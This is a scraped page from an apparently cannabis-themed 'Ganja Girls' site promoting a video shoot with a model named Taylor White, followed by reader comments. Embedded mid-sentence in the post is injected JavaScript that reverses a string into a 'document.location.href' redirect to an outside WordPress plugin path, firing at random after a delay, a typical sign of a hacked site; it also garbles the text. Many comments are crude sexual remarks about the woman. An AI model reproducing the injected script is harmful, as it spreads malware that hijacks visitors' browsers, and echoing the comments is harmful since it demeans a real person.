Taylor White Breaks The Internet. Feat: Checklist By Shy Glizzy & Fat Trel | Ganja Girls

We just did a brand new Ganja Girls shoot with Taylor white…. Shes almost toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}too hot for words 🙂
Music By: Shy Glizzy & Fat Trel (Checklist)
Glass By: Glass Labs 303

Ganja Girls Youtube Videos

29 thoughts on “Taylor White Breaks The Internet. Feat: Checklist By Shy Glizzy & Fat Trel | Ganja Girls”

  1. dRock1620 4life says:

    Rope worthy

  2. Robson JKR says:


  3. Andrew Strahan says:

    tattoo on the chest someone didnt like daddy

  4. Chris Torelli says:

    My by , Ganja Girls , playlist , posted on G+ , Thumbs up 🙂

  5. D-MF-L says:

    Holy fuck I fell in love

  6. Ruben Monge says:

    i already got her pregnant guys sorry look somewete else to stick your dick in

  7. Mux Muxan says:


  8. AllstarSP GTR says:

    Cute as fuuck

  9. laxgoalie251 says:

    She's a cutie

  10. MrAlucardDante says:

    Cute face, but too much eyebrows, ass and not enough boobs

  11. HighLifeStyle.ch TV says:

    love this girl ♥

  12. PsychopathicJonny says:

    G town smoking sexy ganja girls r the best

  13. Lewis Palmer says:

    can i bang? 😛

  14. sickhoboful says:

    I've met her she's so sweet

  15. Squeeze. says:

    Sadece bir kere versen amını yırtarım

  16. Weed Mann says:

    i have weed girl on my channel!

  17. WeeItsNookies says:

    Jesus I don't know what gave me aids first and faster. That horrible damn song with cringe as fuck lyrics or this skank.

  18. Gary Moore says:

    I'm in love…!!!

  19. shiko yo says:

    what is song name?

  20. Idris Minegolov says:

    She is beautiful and very sexy…!

  21. antwone94250 says:

    seeing that smile was like the first time I heard the Beatles! I think I'm in love.

  22. freaky nation says:

    that's bae

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